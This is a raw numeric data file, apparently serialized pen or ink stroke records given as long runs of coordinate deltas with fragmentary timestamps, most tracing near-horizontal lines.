20 16,-19 0-16,0-20 16,-1 0-1,1 0-15,0 0 16,-1 0 0,1 0-16,20 0 15,-1 0-15,1 0 16,39 0-16,-20 0 15,1 0-15,-1 0 16,20 0-16,-19 0 16,-21 0-16,1 0 15,-21 0-15,1 0 16,-20 0-16,20 0 16,-21 0-16,21 0 15,-20 0-15,0 0 16,20 0-1,-21 0-15,1 0 16,0 0 0,0 0 46,0 0-46,-20 20 31,0-1-32,0 1-15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31.3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68 4410 0,'-53'0'125,"-17"0"-109,-36 0-16,18 0 15,17 0-15,1 0 16,-36 0-1,35 17-15,1-17 0,-36 18 16,0 0-16,0-18 16,0 0-1,18 0-15,18 0 16,17 0-16,0 0 16,0 0-16,0 0 15,35 0-15,-17 0 16,0 0-16,-18 0 15,0 0-15,0 17 16,0-17-16,0 18 16,0-18-16,0 18 15,-17-18-15,17 17 16,0-17-16,35 0 16,1 0-16,-19 0 15,36 18-15,-17-18 16,-1 17-1,0-17 32,1 0-15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33.0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02 4445 0,'17'0'31,"1"0"-15,0 0-16,17 0 16,0 0-16,71 0 15,35 0-15,36 0 16,34 18-16,1 17 15,-18-17-15,-18-1 16,-35 1 0,-70-1-16,-36-17 0,-17 18 15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35.0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647 4427 0,'18'0'62,"-1"0"-46,36 0-1,0 0-15,18 0 16,-1 0 0,-17 0-16,18 0 0,35 0 15,-36 0-15,-17 0 16,18 0-16,-54-17 15,19 17-15,16 0 16,1-18-16,-17 0 16,17 1-1,-18 17-15,18-18 0,0 1 16,17 17-16,54 0 16,-1 0-1,18 0-15,18 0 16,17 0-16,-17 0 15,18 0-15,-1 0 16,-17 0-16,-18 0 16,0 0-16,0 0 15,0 0-15,-35 0 16,17-18-16,-70 18 16,88-18-1,-123 18 1,17 0-16,-17 0 15,0 0 1,-1 0 0,1 0-1,0 0 1,-1 0-16,19-17 16,-1 17-16,18 0 15,0 0-15,17 0 16,36 0-16,-35 0 15,17 0-15,-18 0 16,19 0-16,-37 0 16,1 0-16,0 17 15,-17-17 1,-19 18 0,1-18-16,-1 0 15,1 0 1,17 0-16,1 0 15,-1 0-15,0 0 16,18 0-16,0 0 16,0 0-16,0 0 15,17 0-15,1 0 16,0 0-16,34 0 16,-34 0-16,17 0 15,18 0-15,-18 0 16,-17 0-16,-18 0 15,-18 0-15,18 0 16,-36 0 0,1 0 62,0 0-16,-1 0-46,19 0 0,-19 0-16,1 0 15,17 0-15,0 0 16,1 0-16,-1 0 15,18 0-15,0 0 16,17 18-16,19-18 16,16 17-16,19 1 15,141 17 1,-124-17 0,-18-1-16,1 1 0,-19 0 15,-52-1-15,0-17 16,-35 0-16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41.8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02 7514 0,'0'18'109,"35"-18"-93,18 0-16,35 0 16,0 0-16,54 0 15,-19 0-15,0 0 16,-17 0 0,0 0-16,-35 0 15,17 0-15,0 0 16,-17 0-16,-1 0 15,1 0-15,-18 0 16,17 0-16,1 0 16,-18 0-16,0 0 15,-18 0-15,0 0 16,0 0-16,-17 0 16,0 0-16,-1 0 15,1 0-15,17 0 16,1 0-1,-1 0-15,0 0 16,18 0-16,0 0 16,17 0-16,19 0 15,16 0-15,-16 0 16,17 0-16,-18 0 16,0 0-16,35 0 15,89 0 1,-88 0-1,-36 0-15,18 0 0,-36 0 16,18 0 0,18 0-16,-18 0 15,-17 0-15,35 0 16,-36 0-16,54 0 16,-54 0-16,54 0 15,-18 0-15,17 0 16,1 0-16,-19 0 15,19 0-15,-1 0 16,1 0-16,-1 17 16,-17-17-16,0 18 15,17 0-15,1-18 16,-1 17-16,-17 1 16,18 0-16,17-1 15,-18 1-15,18 0 16,18-1-16,-18-17 15,-53 0-15,36 0 16,-1 0-16,-17 0 16,18 0-16,-1 18 15,-35-1 1,18-17-16,-18 0 0,-52 0 16,17 0-16,-18 0 15,-18 0 1,1 0-16,0 0 15,-1-17-15,1 17 16,0-18 0,17 1-1,-17-1 1,17 18-16,0-18 16,-17 1 15,-1 17-16,1 0-15,17 0 16,-17 0-16,0 0 16,17-18-16,0 18 15,0-18-15,1 18 16,-19 0-16,19 0 16,17 0-16,-1-17 15,1 17-15,-17-18 16,17 18-16,-18 0 15,0 0-15,18 0 16,0 0-16,0 0 16,17 0-16,1 0 15,52 0-15,-34 0 16,34 0 0,18 0-16,-17 0 15,17 0-15,0 0 16,-18 0-16,-17 0 15,35 0-15,-17 0 16,-1 18-16,1-1 16,-1 1-16,-17 0 15,-18-1-15,18 1 16,-53-18-16,0 0 16,0 0-16,-36 0 15,19 0-15,-19 0 16,1 0-16,17 0 15,-17 0-15,17 0 16,1 0-16,-1 0 16,-18 0-16,36 0 15,-17 18-15,-1-18 16,35 0-16,19 0 16,-1 0-16,0 0 15,0 0 1,-4092 0-16,8132 17 0,-4111-17 15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51.8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08 9031 0,'17'0'47,"19"0"-32,52 0-15,35 0 16,54 0-16,34 0 15,1 0 1,17 0-16,-35 0 16,0 0-16,-52 0 15,-54 0-15,-18 0 16,-52 0-16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52.2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800 16411 0,'20'0'47,"0"0"-47,0 0 16,40 0-16,78 0 15,-18 0-15,-1 0 16,19 0-16,-58 0 16,-21 0-16,1-20 15,-20 20-15,-21 0 16,1 0-16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1:52.9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471 9084 0,'35'-18'31,"177"18"-31,105 0 16,18 0-16,159 0 15,-70 0-15,-125 0 16,-52 0-16,-106 0 16,-105 0-16,-19 0 15,-34 0 32,-19 0-47,19 0 16,-1 0-16,0 0 15,1 0 64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10.9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9 10442 0,'18'0'78,"0"0"-78,-1 0 16,19 0-16,17 0 16,-1 0-1,19 0-15,-18 0 16,35 0-16,-17 0 0,17 0 15,18 0 1,-18 0-16,0 18 16,-53-18-16,36 0 15,0 0-15,-19 18 16,1-1-16,0-17 16,-17 0-16,-1 0 15,18 0-15,-18 0 16,18 0-16,-18 0 15,18 0-15,35 0 16,1 0-16,-1 0 16,35 0-16,-35 0 15,18 0-15,-35 0 16,-18 0 0,0 0-16,0 0 15,17 0-15,-17-17 16,35 17-16,0-18 15,1 0-15,-1 1 16,0-1-16,35 18 16,1-18-16,-1 1 15,18-1-15,-17 18 16,-36 0-16,18 0 16,-53 0-16,-18 0 15,0 0-15,1 0 16,-1 0-16,18 0 15,0 0-15,17 0 16,1 0-16,0 0 16,17 0-16,0 0 15,0 0-15,-17 0 16,34 0 0,1 0-16,0 0 0,35 0 15,0 0-15,0 0 16,195 53-1,-160-53-15,-35 0 16,0 0-16,-35 0 16,0 0-16,-36 0 15,1 0-15,0 0 16,-1 0-16,36 0 16,17 0-16,19 0 15,16 0-15,1 18 16,0-1-16,-18-17 15,0 0 1,0 0-16,-35 0 16,17 0-16,1 18 15,17-18-15,0 18 16,-17-1-16,-1 1 16,-35-18-16,0 0 15,-17 17-15,0-17 16,-19 0-16,-16 0 15,17 0-15,-18 0 16,18 0-16,-18 0 16,18 0-16,-18 0 15,1 0-15,-19 0 16,1 0-16,0 0 16,-1 0-1,1 0-15,17 0 0,0 0 16,1 0-16,17 0 15,-1 0 1,19 0-16,0 0 0,-1 0 16,-17 0-16,-35 0 15,-1 0 95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13.9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68 13529 0,'0'-18'78,"17"18"-78,36 0 15,-18 0-15,1 0 16,17 0 0,-36 0-16,36 0 15,0 0-15,0 0 0,35 0 16,-17 0 0,-1 0-16,1 0 15,17 0-15,-35 0 16,0 0-16,0 0 15,17-17-15,19-1 16,-36 18-16,17 0 16,18 0-16,-17 0 15,52 0 1,-87 0-16,-19 0 16,1 0-16,0 0 46,-1 0-46,1 0 16,35 0-16,0 0 16,0 0-16,-1 0 15,19 0-15,0 0 16,17 0-16,18 0 16,-18 0-16,0 0 15,-17 0-15,34 0 16,-34 0-16,-1 0 15,1 0 1,0 0-16,-18 0 0,-1 0 16,1 0-1,0 0-15,18 0 16,-1 0-16,36 0 16,-18 0-16,18 0 15,-35 0-15,17 0 16,-17 0-16,17 0 15,-53 0-15,18 0 16,0 0-16,0 0 16,0 0-16,17 0 15,-17 0-15,18 0 16,-1 0-16,1 0 16,-1 0-16,1 0 15,-1 0-15,36 0 16,-18 0-16,-17 0 15,0 0-15,34 0 16,-34 0-16,0 0 16,-1 0-16,36 0 15,-35 0-15,52-18 16,-17 1-16,0 17 16,-18 0-1,-18 0-15,36 0 16,-35 0-16,-1 0 15,36 0-15,-35 0 16,35 0-16,-18 0 16,0 0-16,-17 0 15,-19 0-15,-16 0 16,-19 0-16,36 0 16,-17-18-16,-1 18 15,-18 0-15,19 0 16,-1 0-16,0 0 15,1 0-15,16 0 16,1 18-16,18-18 16,-1 0-16,36 0 15,-17 0-15,16 0 16,-16 0-16,16 0 16,1 0-16,0 0 15,-18 0-15,18 0 16,-35 0-16,17 0 15,-18 0-15,1 0 16,35 17-16,17 1 16,1 0-16,17 17 15,0-35-15,-18 0 16,-17 0 0,35 0-16,0 0 15,-17 0-15,-1 0 16,1 0-16,-54 0 15,1 0-15,-18 0 16,0 0-16,-18 0 16,0 18-16,-17-18 15,0 0-15,-1 0 16,1 0-16,0 0 16,17 0-1,18 0-15,17 0 16,-17 0-16,18 0 15,-1 0-15,19 0 16,-37 0-16,19 0 16,-18 0-16,-18 0 15,-17 0 1,-1 0 0,1 0-16,17 0 15,18 0 1,18 0-16,17 0 15,36 0-15,-19 0 16,-16 0 0,-1 0-16,-35 0 0,0 0 15,-36 0 1,1 0 140,0 0-140,-1 0 140,-17-18-14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7:00.1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88 4568 0,'18'-17'16,"-1"-18"0,1 35-16,17-18 15,1 0-15,-1 18 16,36-17-16,-19 17 15,1-18-15,53 18 16,-18-18-16,36 18 16,-1 0-16,18 0 15,18 0-15,53 0 16,17 0-16,-17 0 16,35 0-16,-18 0 15,-53 0-15,36 0 16,-18 0-16,35 0 15,-17 0-15,0 0 16,-53 0-16,-18 0 16,-18 0-16,18 0 15,0 0-15,0 0 16,53 0-16,-52 0 16,34 0-16,0 0 15,-17 0-15,0 0 16,-18 0-1,-18 0-15,1 0 16,-1 0-16,-17 0 16,-18 0-16,-35 18 15,-35-18-15,0 18 16,-18-1-16,17 1 31,-17 0-15,18-1-1,17-17-15,18 0 16,18 0-16,17 0 16,88 0-1,-88 0-15,-17 0 16,17 0-16,-35 0 16,-18 0-16,-17 0 15,0 0 22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8T00:48:24.7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09 7461 0,'20'0'47,"20"20"-47,19-20 16,1 0-16,19 0 15,-39 20-15,79-20 16,40 0-16,-1 0 16,21 0-16,59 0 15,0 0-15,60 0 16,-40 0-16,39 0 15,-39 0-15,0 0 16,-158 0-16,197 0 16,-59 0-16,0 0 15,-39 0-15,-1 0 16,-59 0-16,-20 0 16,0 0-16,-39 39 15,-21-39-15,21 0 16,-41 20-16,21 0 15,-40 0-15,0-20 16,19 0-16,-19 20 16,0-20-1,0 20-15,0-20 16,-1 0 0,1 0-1,0 0-15,0 0 16,20 0-16,19 0 15,-19 0-15,19 0 16,-19 0-16,20 0 16,-21 0-16,21 0 15,-1 0-15,-19 0 16,0 0-16,-1 0 16,-19 0-16,20 0 15,20 0-15,-1 0 16,-19 0-16,19 0 15,-19 0-15,19 0 16,1 0-16,0 0 16,-21 0-16,21 0 15,-1 0-15,-19 0 16,0 0 0,19 0-16,1 0 0,-21 0 15,1 0 1,-20 0-16,0 0 15,20 0-15,-21 0 16,21 0 0,-20 0-1,20 0-15,-21 0 16,21 0-16,0 0 16,-1 0-16,1 0 15,0 0-15,19 0 16,1 0-16,-1 0 15,-19 0-15,0 0 16,-20 0-16,-1 0 16,1 0-16,0 0 15,20 0-15,0 0 16,-1 0 0,1 0-16,19 0 15,-39 0-15,20 0 16,20 0-16,-21 0 15,-19 0-15,40 0 16,-1 0-16,-19 0 16,39 0-16,-19 0 15,-1 0-15,-39 0 16,59 0 0,1 0-16,-1 0 15,-19 0-15,-1 0 16,21 0-16,-21 0 15,-19 0-15,39 0 16,1 0-16,-1 0 16,20 0-16,-39 0 15,-21 0-15,1 0 16,-20 0-16,0 0 16,20 0-16,-1 0 15,-19 0 1,0 19-1,0-19-15,0 0 16,19 0 0,1 0-1,-20 0-15,19 0 16,21 0-16,-40 0 16,20 0-16,-21 0 15,21 0-15,0 0 16,19 0-16,21 0 15,-1 0 1,-39 0 0,39 0-16,-19 0 15,-1 0-15,-19 0 16,0 20-16,-1-20 16,21 20-16,-40 0 15,19-20-15,1 20 16,0 0-16,-20-20 15,19 19-15,-19-19 16,20 0-16,-1 0 16,-19 0-16,0 0 15,0 0-15,0 0 16,19 0-16,21 0 16,0 0-16,19 0 15,-39 0-15,39 0 16,20 0-16,-19 0 15,-21 0-15,1 0 16,-41 0-16,1 0 16,0 0-16,0 0 15,0 0-15,20 0 16,-21 0 0,21 0-16,20 0 15,-1 0 1,1 0-16,-1 0 15,1 0-15,-21 0 16,1-19 0,-20 19-1,0 0 1,0 0 15,-1 0 0,1 0 79,0 0-95,0 0 1,0 0 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34.9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22 6791 0,'18'0'79,"0"0"-79,-1 0 15,1 0 1,17 0-16,18-18 15,35 18-15,36 0 16,17 0-16,18 0 16,17 0-16,-17 0 15,-18 0 1,-35 0-16,-18 0 16,-35 0-16,0 0 15,0 0-15,17 0 16,1 0-16,-1 0 15,54 0-15,-36 0 16,35 0-16,-17 0 16,-17 0-16,-37 0 15,-16 0-15,-1 0 16,-17 0-16,-1 0 16,1 0-16,0 0 15,17 0-15,0 0 16,18 0-16,18 0 15,-1 0-15,-17 0 16,0 0-16,0 0 16,-18 0-16,18 0 15,-18 0-15,18 0 16,0 0-16,0 0 16,0 0-16,0 0 15,17 0 1,1 0-16,17 0 0,-17 0 15,-18-17-15,0 17 16,0-18-16,-1 0 16,1 18-1,-17 0-15,17 0 16,-1 0-16,1 0 16,18 0-16,17 0 15,36 0-15,-36 0 16,18 0-16,-18 0 15,-53 0-15,0 0 16,1 0 0,-19 0 46,1 0-62,0 0 156,-1 0-156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36.3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70 6862 0,'18'0'63,"17"0"-48,1 0-15,34 0 16,36 0-16,0 0 15,0 0-15,-18 0 16,-18 0-16,-34 0 16,-1 0-16,-17 0 31,-1 0 0,1 0-15,0 0-1,-1 0 1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39.0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87 6862 0,'17'0'47,"18"0"-31,1 0-16,34 0 16,1 0-16,17 0 15,36 0-15,-1 0 16,0 0-16,19 35 15,-19-35-15,-35 17 16,0 1-16,-35-18 16,0 0-16,-35 0 15,0 0-15,-1 0 16,1 0-16,17 0 31,-17 0 0,35 0-31,0-18 16,35 18-16,-18 0 16,36 0-16,-18 0 15,-17 0-15,-1 0 16,-17 0 0,0 0-16,-17 0 15,16 0-15,-34 0 625,35 0-609,18 0-1,17 0-15,-18 0 16,36 0-16,0 0 16,-35 0-16,34 0 15,-16 0-15,-19 0 16,18 0-16,-17 0 16,-36 0-16,18 0 15,-35 0-15,-1-17 16,19-1-16,-1 18 15,-17 0 1,-1-17 0,18 17 15,-17 0-15,17 0-16,36 0 15,-1 0-15,54 0 16,-1 0-16,-17 0 15,18 0-15,-18 0 16,-18 0-16,-18 0 16,1 0-16,-36 0 15,0 0-15,-17 0 16,0 0 46,-1 0-46,19-18-16,17 18 16,-1 0-16,1 0 15,18 0-15,-36 0 16,18-18-16,-18 1 16,1 17-16,-1 0 15,-17 0 1,17 0 203,-17 0-204,-1 0-15,18 0 16,-17 0-16,0 0 15,17 0-15,-17 0 16,-1 0-16,1 0 63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41.0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230 6932 0,'-17'0'31,"-36"0"-31,-35 0 16,17 18-16,1-18 15,-36 17-15,0-17 16,0 0-16,-17 0 15,17 0-15,-18 0 16,1 0-16,17 0 16,18 0-16,53 0 15,17 0-15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43.2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8 8396 0,'18'0'15,"-1"18"17,1-18-17,-18 17 1,17-17 0,19 0-16,-19 0 15,1 0 1,17 0-16,18 0 15,18 0-15,35 0 16,-1-17-16,-34 17 16,-18-18-1,-18 18-15,-17-18 0,-1 18 16,1 0 15,0 0-31,-1 0 16,1-17-16,17 17 15,36 0-15,-18 0 16,35 0-16,-35 0 16,0 0-16,17 0 15,-34 0-15,17 0 16,-18 0-16,0-18 16,18 18-16,-18-17 15,36 17-15,17-18 16,-35 18-16,0 0 15,35 0-15,-17 0 16,-18 0-16,-1 0 16,1 0-16,-35 0 15,0 0-15,-1 0 16,1 0-16,0 0 16,-1 0-16,19 0 15,-1 0 1,18 0-1,0 0-15,0 0 16,-18 0-16,18 0 16,0 0-16,-36 0 15,36 0-15,-18-18 16,-17 18-16,17 0 16,-17 0-16,17-17 15,-17 17-15,35 0 16,0 0-16,0 0 15,17 0-15,18 0 16,-17 0-16,17 0 16,106 0-1,-123 0-15,-18 0 16,-18 0-16,-17 0 16,35 0-16,-36 0 15,1 0-15,17 0 16,18 0-16,18 0 15,-1 0-15,36 0 16,17 0-16,-17 0 16,18 0-16,17 0 15,-18 0-15,1 0 16,-36 0 0,-17 0-16,-1 0 0,1 0 15,-1 0-15,36 0 16,18 0-16,-36 0 15,35 0 1,-17 0-16,0 0 16,17 0-16,-17 0 15,18 0-15,-1 0 16,-35 0-16,36 0 16,-36 0-16,18 0 15,-18 0-15,-17 0 16,34 0-16,-52 0 15,18 0-15,-1 0 16,-17 0-16,0 0 16,18 0-16,-1-18 15,-17 18-15,18 0 16,-18 0-16,0 0 16,-36 0-16,19 0 15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9:53.7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24 17661 0,'19'0'63,"21"0"-48,99 0-15,40 0 16,39 0-16,40 0 15,20 0-15,-20 0 16,19 0-16,21 0 16,-20 0-16,39 0 15,-39 0-15,0 0 16,-20 0-16,40 0 16,-40 0-16,0 0 15,19 0-15,-177 0 16,197 0-16,-98 0 15,59 0-15,-60 0 16,-19 0-16,-20 0 16,-21 0-16,21 0 15,0 0-15,0 0 16,19 0-16,21 0 16,-41 0-16,21 0 15,0 0-15,19 20 16,0-20-1,21 0-15,-160 0 0,80 0 16,-20 0 0,-39 0-16,-41 0 15,1 0 1,-20 0 0,20 0-1,-21 0-15,1 0 16,20 0-1,-20 0-15,19 0 16,-19 0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2:50.8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08 10989 0,'18'0'78,"0"0"-47,-1 0-31,19 0 16,-1-18-16,18 18 16,0-17-16,-18 17 15,18 0-15,18-18 16,-36 18-16,35 0 15,-17 0-15,0 0 16,0 0-16,0 0 16,18 0-16,-1 0 15,18 0-15,-35-18 16,35 18-16,-17-17 16,-18 17-16,53-18 15,-36 18-15,54-17 16,-18 17-16,35 0 15,0 0-15,0 0 16,-18 0-16,1 0 16,-1 0-16,-17 0 15,18 0-15,-1 0 16,-17 0-16,17 0 16,-17 0-16,-18 0 15,1 0-15,34 0 16,-17 0-16,53 0 15,-18 0 1,-18 0-16,18 0 16,18 0-16,-35 0 15,-19 0-15,37 0 16,-19 0-16,1 0 16,-54 0-16,18 0 15,18 0-15,-53 0 16,0 0-16,-18 0 15,18 0-15,0 0 16,18-18-16,34 0 16,-34 18-16,0-17 15,34-1-15,-34 0 16,0 18-16,17-17 16,-35 17-16,17 0 15,36 0-15,0 0 16,-18 0-16,53 0 15,0 0-15,36 0 16,-36 0-16,18 0 16,-1 0-16,19 0 15,-36 0-15,17 0 16,-16 0-16,-19 0 16,1-18-1,-36 18-15,-35 0 16,35 0-16,-35 0 15,17 0-15,-17 0 16,18 0-16,17 0 16,-17 0-16,34 0 15,-52 0-15,18 0 16,-36-18-16,0 18 16,18-35-16,-17 35 15,-19 0-15,19-17 16,-19 17-16,1 0 15,-1 0 1,1 0 0,17 0-1,1 0-15,-1 0 16,18 0-16,35-18 16,-35 18-16,18-18 15,-19 18-15,54-17 16,-35 17-1,35-18-15,-53 18 0,17 0 16,-35 0-16,36 0 16,-18 0-1,0 0-15,0 0 16,-18 0-16,0 0 16,-17 0-16,17-18 15,-17 18 79,-1 0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02.6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33 13529 0,'18'-18'15,"0"1"1,17-1-1,-17 18 17,-18-18-32,17 18 15,36-17-15,-35 17 16,52 0-16,54 0 16,70-18-16,-18-17 15,71 0-15,-17 17 16,34-17-16,54-18 15,-54 18-15,-52-1 16,35 19-16,-35-36 16,-36 53-16,18-18 15,0 18-15,0-18 16,18 1 0,17-1-16,-35 18 15,0 0-15,18 0 16,-1 0-16,-34 0 15,-19 0-15,-16 0 16,-54 0-16,-18 0 16,-17 0-16,0 0 15,-35 0-15,-1 0 16,1 0-16,0 0 47,17 0-47,0 0 15,36 0 1,17 0-16,35 0 0,1 0 16,-1 0-16,-34 0 15,-19 0 1,1 0-16,-36 0 16,0 0-16,-17 0 15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04.8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374 13423 0,'-17'0'16,"70"0"109,17 0-125,54 0 16,34 0-16,-34 0 15,17 0 1,-18 0-16,-34 0 0,34-17 15,-52 17-15,34-18 16,-16 18-16,16-18 16,-16 18-16,17 0 15,-36 0-15,18 0 16,18 0 0,-18 0-16,18 0 15,0 0-15,0 0 16,-18 0-16,18 0 15,-18 0-15,18 0 16,-18 0-16,0 0 16,-17 0-16,35 0 15,-53 0-15,-1 0 16,-16 0-16,17 0 16,-18 0-16,-17 0 15,17 0-15,-17 0 16,-1 0 46,1 0-46,-1 0-16,19 0 16,-1 0-16,18 0 15,-18 0-15,36 0 16,-1 0-16,-34 0 15,34 0-15,-17 0 16,0 0 0,-18 0-16,-17 0 203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06.2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56 14834 0,'36'0'62,"-1"0"-62,0 0 16,36 18-16,-18-18 16,35 0-16,18 0 15,70 0-15,1 0 16,34 0-16,1 0 15,17 0-15,-17 0 16,17 0-16,-52 0 16,-36 0-16,-53 0 15,-35 0-15,-36 0 16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39.8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51 4233 0,'17'0'78,"36"0"-78,0 0 16,35 0-16,0 0 16,54 0-16,-1 0 15,0 0-15,18 0 16,17 0-16,-17 0 16,-1 0-16,36 0 15,0 0-15,-17 0 16,17 0-16,-35 0 15,35 0 1,-36 0-16,-16 0 0,34 0 16,-17 0-16,-18 0 15,0 0 1,-18 0-16,-34 0 16,16 0-16,-16 0 15,-19 0-15,36 0 16,0 0-16,17 0 15,1 0-15,17 0 16,0 0-16,18 0 16,-1 0-16,-16 0 15,52 0-15,-53 0 16,-18 0-16,18 0 16,-17 0-16,-18 0 15,-1 0-15,-16 0 16,-19 0-16,36 0 15,53 0 1,-36 0-16,1 0 16,17 0-16,0 0 15,18 0-15,-1 0 16,19 0-16,-18 0 16,-1 0-16,19 0 15,-19 0-15,-34 0 16,17 0-16,-53 0 15,18 0-15,-18 0 16,0 0-16,36 0 16,-1 0-16,1 0 15,-36 0-15,0 0 16,36 0-16,-1 0 16,-35 0-1,18 0-15,-18 0 16,18 0-16,-18-17 15,18 17-15,-18 0 16,18 0-16,0 0 16,53 0-16,-18 17 15,18 1-15,-18 17 16,-18-35-16,18 0 16,-17 0-16,17 0 15,-17 0-15,-19 0 16,19 0-16,-1 0 15,1 0-15,-18 0 16,17 0-16,1 0 16,-19 0-16,1 0 15,-18 0-15,-17 0 16,-18 0-16,17 0 16,19 0-1,-36 0-15,17 0 16,1 0-16,-1 0 0,18 0 15,18 0 1,0 0-16,53 0 16,17 0-16,-17 0 15,17 0-15,-35 0 16,18 0-16,-35 0 16,-54 0-16,1 0 15,-54 0-15,36 0 16,-35 0-1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41.6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001 4586 0,'18'-18'78,"35"18"-62,0 0-16,35 0 16,0 0-1,18 0-15,-36 0 0,19 0 16,-37 0-16,-16 0 15,-54 0 64,0 0-79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43.1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5733 0,'-18'0'31,"36"0"-15,17 0-1,35 17-15,36-17 16,53 18-16,17-18 16,54 0-16,17 0 15,88 0-15,529 0 16,-388 0-1,-35 0-15,0 18 16,-88 17-16,-18-35 16,-53 0-16,-52 0 15,17 17-15,-71-17 16,-17 18-16,-71-18 16,0 0-16,-35 0 15,-35 18-15,-1-18 16,19 0-1,-19 0-15,1 0 16,0 0-16,34 17 16,-16-17-16,-1 0 15,18 18-15,-35-18 16,17 0-16,-18 0 16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48.5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50 7585 0,'0'-18'16,"17"18"-1,1 0-15,35 0 16,35-18-16,0 18 15,36 0 1,-1 0-16,18 0 16,-17 0-16,17 0 15,0 0-15,0 0 16,18 0-16,35 0 16,-35 0-16,52 0 15,1 0-15,0 0 16,-36 0-16,18 0 15,0 0-15,-17 0 16,17 0-16,0 0 16,0 0-16,17 0 15,-17 0-15,18 0 16,-18 0-16,-18 0 16,1 0-16,-36 0 15,-53 0-15,-17 0 16,-18 0-16,-36 0 15,1 0 48,-1 0-47,1 0-1,0 0 1,-1 0 46,19 0-46,-19 0 0,19 0-16,-19 0 15,18 0-15,-17 0 16,17 0-16,-17 0 15,35 0-15,-18 18 16,1-18-16,-1 0 16,0 0-16,0 0 15,1 0-15,-1 0 16,-17 0-16,-1 0 16,-4038 0-1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50.9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970 7620 0,'35'0'63,"36"0"-47,52 18-16,1-18 15,17 0-15,-18 0 16,-34 0-16,16 0 15,-34 0-15,-18 0 16,0 0-16,-18 0 16,71 0-1,-71 0-15,0 0 16,18 0-16,-35 0 16,17 0-16,-17 0 15,17 0 1,-17 0-1,-1 0-15,1 0 16,0 0 0,-1 0-16,1 0 15,0 0 1,-1 0 0,19 0-16,-19 0 15,1 0-15,0 0 16,-1 0-1,1 0-15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53.7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992 7602 0,'0'0'0,"-18"0"16,-17 0-16,-1 0 16,1 0-1,-18 0-15,0 0 16,0 0-16,1 0 15,-37 0-15,-17 0 16,-35 0-16,0 0 16,-35 0-16,35 0 15,17 0-15,-17 0 16,35 0-16,1 0 16,-1 0-16,0 0 15,-18 0-15,36 0 16,18 0-16,-1 0 15,36 0-15,-18 0 16,35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1:09.8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22 4391,'18'0,"0"-19,37 19,-19 0,37 0,54 0,0 0,18 0,0 0,0 0,18 0,37 0,-37 0,0 0,37 0,-37 0,19 0,-1 0,-36 0,37 0,-37 0,-36 0,18 0,-55 0,37 0,-18 0,-37 0,19 0,-1 0,-17 0,-19 0,0 0,-17 0,-1 19,0-19,0 0,0 0,0 0,0 0,1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55.6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05 8872 0,'18'0'0,"-1"0"32,1 18-17,-18 0 16,18-18-31,17 0 16,0 0-16,53 17 16,53-17-16,1 18 15,-19-18-15,18 0 16,0 0-16,0 0 16,-17 0-16,-18 0 15,52 0-15,-52 0 16,71 0-16,-36 0 15,0 0-15,-35 0 16,17 0-16,-35 0 16,1 0-16,-19 0 15,1 0-15,-1 0 16,-17 0 0,18 0-16,-1 0 15,1 0-15,35 18 0,-18-18 16,35 0-1,1 0-15,-36 17 16,35 1-16,-17-18 16,-18 0-16,-17 0 15,0 0-15,-19 0 16,1 0-16,0 0 16,0 0-16,0 0 15,0 0-15,0 0 16,0 0-16,17 0 15,1 0-15,0 0 16,87 17 0,-52-17-16,0 0 15,-18 0-15,-17 0 16,-1 0-16,-34 0 16,-1 0-16,-18 0 62,19 0-46,-1 0-1,0 0-15,1 18 16,-19-18 0,19 0-16,-19 0 15,18 0 16,-35 18-31,36-18 16,-1 17-16,0-17 16,36 0-16,17 18 15,-17-18-15,17 18 16,0-1-16,18 1 16,17 0-16,-17-18 15,0 0-15,17 0 16,-34 0-16,-54 0 15,0 0-15,-17 0 94,-1 0-47,1 0-31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3:56.4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95 9137 0,'18'0'47,"35"0"-47,53 0 0,52 0 16,19 0-16,52 0 16,88 0-1,-70 0-15,0 0 16,-17 0-16,-36 0 15,-36 0-15,-69 0 16,-36 0-16,-18 0 16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4:00.5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68 10460 0,'17'0'47,"1"0"-31,0 0-1,34 0-15,19 0 16,-18 18-16,18-18 16,-19 0-16,19 0 15,-18 0-15,35 0 16,0 0-16,53 0 16,-17 0-16,-1 0 15,1 17-15,-36-17 16,-17 0-16,34 18 15,-52-18-15,-17 0 16,17 0-16,-18 0 16,35 0-16,36 0 15,-18 0-15,53 0 16,1 0-16,52 0 16,17 0-16,19 0 15,-19 0-15,-34 0 16,-36 0-16,-18 0 15,-52 0-15,-1 0 16,-17 0-16,0 0 16,18 0-16,17 0 15,-18 0-15,1 0 16,17 0-16,36 0 16,-1 0-16,-17 0 15,35 0-15,-35 0 16,17 0-16,-52 0 15,0 0-15,-19 0 16,-34 0 0,0 0-16,-1 0 15,1 0 17,0 0-17,17 0-15,35 0 16,36 0-16,18 0 15,17 17-15,71-17 16,-36 0-16,18 18 16,-53-18-16,35 35 15,-70-35-15,0 0 16,-18 0-16,-17 0 16,-18 0-16,53 36 15,-36-36-15,-17 17 16,18-17-16,-1 18 15,-17 0 1,53-18-16,-18 0 0,-17 0 16,35 0-16,-36 0 15,1 0 1,-1 0-16,-34 0 0,16 0 16,-16 0-16,17 0 15,-18 0 1,18 0-16,-36 0 15,19 0-15,-19 0 16,19 0-16,-19 0 16,1 0-16,17 0 15,-17 0-15,17 0 16,0 0 0,18 0-16,0 0 15,0 0-15,0 0 16,0 0-16,0 0 15,0 0-15,17 0 16,-17 0-16,18 0 16,-1 0-16,-17 0 15,18 0-15,-1 0 16,-17 0-16,18 0 16,-18 0-16,17 0 15,36 0-15,18 0 16,-54 0-16,36-18 15,18 18 1,-54 0 0,-17 0-16,53-18 0,0 1 15,-53 17 1,-18 0-16,0 0 0,0 0 16,-17 0-1,0 0-15,17-18 16,0 18-16,1 0 15,-19 0 1,1 0-16,17 0 16,-17 0-16,-1 0 15,36 0-15,-17 0 16,-19 0-16,1 0 16,-1 0-16,19 0 93,-19 0 48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4:02.1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50 10654 0,'0'0'0,"0"18"32,17-1-32,-17 1 15,53-18-15,35 0 16,18 0-16,0 0 16,17 0-16,19 0 15,16 0-15,-17 0 16,1 0-16,-19 0 15,-17 0-15,-71 0 16,-17 0-16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17.1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9 15646 0,'0'0'0,"35"0"15,-17 0 17,0 0-17,35 0 1,0 0-16,52 0 16,36 0-16,36 0 15,17 0-15,53 0 16,35 0-16,71 0 15,-71 0 1,-17 0-16,-36 0 0,-35 0 16,-35 0-16,-18 0 15,-18 0 1,-87 0 31,-36-18-47,-36 0 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18.0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50 15505 0,'0'17'63,"89"-17"-48,228 53 1,-105-35-16,52 35 15,-17-53-15,88 17 16,18 36-16,35-53 16,988 71-1,-18-71 17,-881 0-32,52 0 15,-53 0-15,71 35 16,599-35-1,107 0 17,-548 0-17,-246 0 17,-318 0-17,-123 0 32,-1 0 0,18 0-47,-17 0 16,35 18-1,0-1 